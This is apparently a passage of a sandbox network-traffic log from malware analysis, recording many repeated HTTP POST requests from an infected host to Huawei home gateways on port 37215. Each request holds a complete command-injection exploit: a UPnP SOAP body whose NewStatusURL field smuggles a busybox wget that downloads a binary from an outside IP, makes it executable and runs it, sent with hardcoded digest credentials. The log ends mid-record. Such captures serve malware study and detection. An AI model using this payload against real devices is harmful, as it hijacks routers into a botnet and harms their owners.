                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2299192.168.2.155098441.45.217.8437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.675064087 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2300192.168.2.153579241.217.252.4737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.675064087 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2301192.168.2.153568441.140.65.14137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.675101042 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2302192.168.2.155674641.63.71.9837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.675101042 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2303192.168.2.153323041.215.85.2337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.675139904 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2304192.168.2.153626841.11.197.4337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.675189018 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2305192.168.2.153987241.197.108.13137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.675209045 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2306192.168.2.153597041.200.13.5537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.675214052 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2307192.168.2.154140041.101.88.24537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.675710917 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2308192.168.2.154889241.66.124.14737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.676229000 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 